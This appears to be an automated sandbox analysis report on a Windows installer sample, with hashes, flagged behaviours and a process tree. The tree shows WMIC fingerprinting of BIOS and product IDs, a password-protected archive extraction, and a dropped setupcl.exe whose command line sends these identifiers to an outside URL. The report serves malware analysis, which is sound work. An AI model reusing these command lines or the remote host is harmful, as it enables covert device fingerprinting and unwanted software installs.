Analysis
-
max time kernel
140s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
05-05-2024 08:33
Static task
static1
Behavioral task
behavioral1
Sample
16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/7za.exe
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/7za.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240419-en
General
-
Target
16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe
-
Size
407KB
-
MD5
16d72c8deb46cad6112866fff84e8857
-
SHA1
4346028b8fc749e9260b00e5bf2e97e2e2336458
-
SHA256
af83e27f4aaabdb8f79e39075659ca029b41acbe8f69a8805032665a72776ad4
-
SHA512
e12e5e64cc11780a14b5cc943fdf9656fa40f70be50e2267ad6a7ef1bb2accbd582864d2e0cd480348864a85f7df8c08400219962c2a7b4f49f5f11c6cda9315
-
SSDEEP
12288:FA0i50G5F69f26BlEoPdLsR3pFztoucrcQo:FAfyG5F69JEoF41pFzcLo
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 3912 7za.exe 3908 setupcl.exe -
Loads dropped DLL 5 IoCs
pid Process 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2148 WMIC.exe Token: SeSecurityPrivilege 2148 WMIC.exe Token: SeTakeOwnershipPrivilege 2148 WMIC.exe Token: SeLoadDriverPrivilege 2148 WMIC.exe Token: SeSystemProfilePrivilege 2148 WMIC.exe Token: SeSystemtimePrivilege 2148 WMIC.exe Token: SeProfSingleProcessPrivilege 2148 WMIC.exe Token: SeIncBasePriorityPrivilege 2148 WMIC.exe Token: SeCreatePagefilePrivilege 2148 WMIC.exe Token: SeBackupPrivilege 2148 WMIC.exe Token: SeRestorePrivilege 2148 WMIC.exe Token: SeShutdownPrivilege 2148 WMIC.exe Token: SeDebugPrivilege 2148 WMIC.exe Token: SeSystemEnvironmentPrivilege 2148 WMIC.exe Token: SeRemoteShutdownPrivilege 2148 WMIC.exe Token: SeUndockPrivilege 2148 WMIC.exe Token: SeManageVolumePrivilege 2148 WMIC.exe Token: 33 2148 WMIC.exe Token: 34 2148 WMIC.exe Token: 35 2148 WMIC.exe Token: 36 2148 WMIC.exe Token: SeIncreaseQuotaPrivilege 2148 WMIC.exe Token: SeSecurityPrivilege 2148 WMIC.exe Token: SeTakeOwnershipPrivilege 2148 WMIC.exe Token: SeLoadDriverPrivilege 2148 WMIC.exe Token: SeSystemProfilePrivilege 2148 WMIC.exe Token: SeSystemtimePrivilege 2148 WMIC.exe Token: SeProfSingleProcessPrivilege 2148 WMIC.exe Token: SeIncBasePriorityPrivilege 2148 WMIC.exe Token: SeCreatePagefilePrivilege 2148 WMIC.exe Token: SeBackupPrivilege 2148 WMIC.exe Token: SeRestorePrivilege 2148 WMIC.exe Token: SeShutdownPrivilege 2148 WMIC.exe Token: SeDebugPrivilege 2148 WMIC.exe Token: SeSystemEnvironmentPrivilege 2148 WMIC.exe Token: SeRemoteShutdownPrivilege 2148 WMIC.exe Token: SeUndockPrivilege 2148 WMIC.exe Token: SeManageVolumePrivilege 2148 WMIC.exe Token: 33 2148 WMIC.exe Token: 34 2148 WMIC.exe Token: 35 2148 WMIC.exe Token: 36 2148 WMIC.exe Token: SeIncreaseQuotaPrivilege 4612 WMIC.exe Token: SeSecurityPrivilege 4612 WMIC.exe Token: SeTakeOwnershipPrivilege 4612 WMIC.exe Token: SeLoadDriverPrivilege 4612 WMIC.exe Token: SeSystemProfilePrivilege 4612 WMIC.exe Token: SeSystemtimePrivilege 4612 WMIC.exe Token: SeProfSingleProcessPrivilege 4612 WMIC.exe Token: SeIncBasePriorityPrivilege 4612 WMIC.exe Token: SeCreatePagefilePrivilege 4612 WMIC.exe Token: SeBackupPrivilege 4612 WMIC.exe Token: SeRestorePrivilege 4612 WMIC.exe Token: SeShutdownPrivilege 4612 WMIC.exe Token: SeDebugPrivilege 4612 WMIC.exe Token: SeSystemEnvironmentPrivilege 4612 WMIC.exe Token: SeRemoteShutdownPrivilege 4612 WMIC.exe Token: SeUndockPrivilege 4612 WMIC.exe Token: SeManageVolumePrivilege 4612 WMIC.exe Token: 33 4612 WMIC.exe Token: 34 4612 WMIC.exe Token: 35 4612 WMIC.exe Token: 36 4612 WMIC.exe Token: SeIncreaseQuotaPrivilege 4612 WMIC.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3908 setupcl.exe 3908 setupcl.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4460 wrote to memory of 2148 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 84 PID 4460 wrote to memory of 2148 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 84 PID 4460 wrote to memory of 2148 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 84 PID 4460 wrote to memory of 4612 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 87 PID 4460 wrote to memory of 4612 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 87 PID 4460 wrote to memory of 4612 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 87 PID 4460 wrote to memory of 4264 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 89 PID 4460 wrote to memory of 4264 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 89 PID 4460 wrote to memory of 4264 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 89 PID 4460 wrote to memory of 3272 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 91 PID 4460 wrote to memory of 3272 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 91 PID 4460 wrote to memory of 3272 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 91 PID 4460 wrote to memory of 3912 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 95 PID 4460 wrote to memory of 3912 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 95 PID 4460 wrote to memory of 3912 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 95 PID 4460 wrote to memory of 3908 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 98 PID 4460 wrote to memory of 3908 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 98 PID 4460 wrote to memory of 3908 4460 16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe 98 PID 3908 wrote to memory of 436 3908 setupcl.exe 99 PID 3908 wrote to memory of 436 3908 setupcl.exe 99 PID 3908 wrote to memory of 436 3908 setupcl.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\16d72c8deb46cad6112866fff84e8857_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get UUID /FORMAT:textvaluelist.xsl2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get Version /FORMAT:textvaluelist.xsl2⤵PID:4264
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get Name /FORMAT:textvaluelist.xsl2⤵PID:3272
-
-
C:\Users\Admin\AppData\Local\Temp\nsj3867.tmp\7za.exe7za.exe e -y -p"a1daf52f0ec3baac2c4452d6532d07e9" [RANDOM_STRING].7z2⤵
- Executes dropped EXE
PID:3912
-
-
C:\Users\Admin\AppData\Local\Temp\nsj3867.tmp\setupcl.exe"C:\Users\Admin\AppData\Local\Temp\nsj3867.tmp\setupcl.exe" /initurl http://sub.reichtron.com/init/16d72c8deb46cad6112866fff84e8857_JaffaCakes118/:uid:? /affid "-" /id "0" /name " " /uniqid 16d72c8deb46cad6112866fff84e8857_JaffaCakes118 /uuid stance(s) Available. /biosserial /biosversion BOCHS - 1 /csname stance(s) Available.2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic bios get serialnumber, version3⤵PID:436
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
574KB
MD542badc1d2f03a8b1e4875740d3d49336
SHA1cee178da1fb05f99af7a3547093122893bd1eb46
SHA256c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
SHA5126bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c
-
Filesize
80KB
MD517fc79222adf83f7b1ee302755c2baa3
SHA11a40a4654e87b1c9142fa2d4c33ef109c9c15816
SHA256f2164a7ac43a6a46110a95cf5e41628c3371c1d6f1746448f12c9e30e6552beb
SHA5127c930dd6a3bdcefd6f18985c3908ec04e3fda107bbfcfa50fde3491400539b7808d40a15d9b7a8ece931e5adb4bf3b2ff64fd65df6808e1b07fc57a2418cc5d5
-
Filesize
8KB
MD5b8be6632a7dc8136ff01338be40fe701
SHA1043fa16929b2af5ed5c1c59b4035a10cf765fb43
SHA256289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085
SHA512403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8
-
Filesize
193KB
MD510bd2af1b07ec6bc9cd17ba512569e59
SHA1807e17ab1b98177e135d30941b45081960d1e866
SHA2569c620ef6eac3d0d9d3f6f2622a53d1f543cebd93846636ba397683962c07fc7c
SHA512deacd041f12b6ec74f9e4488874ce962037990ed0ae424aaeabf2c35876b2ebbb943f92e9a4ffe504718bb00021209b035439ea4d7c64a4031b86ce9104ce3ed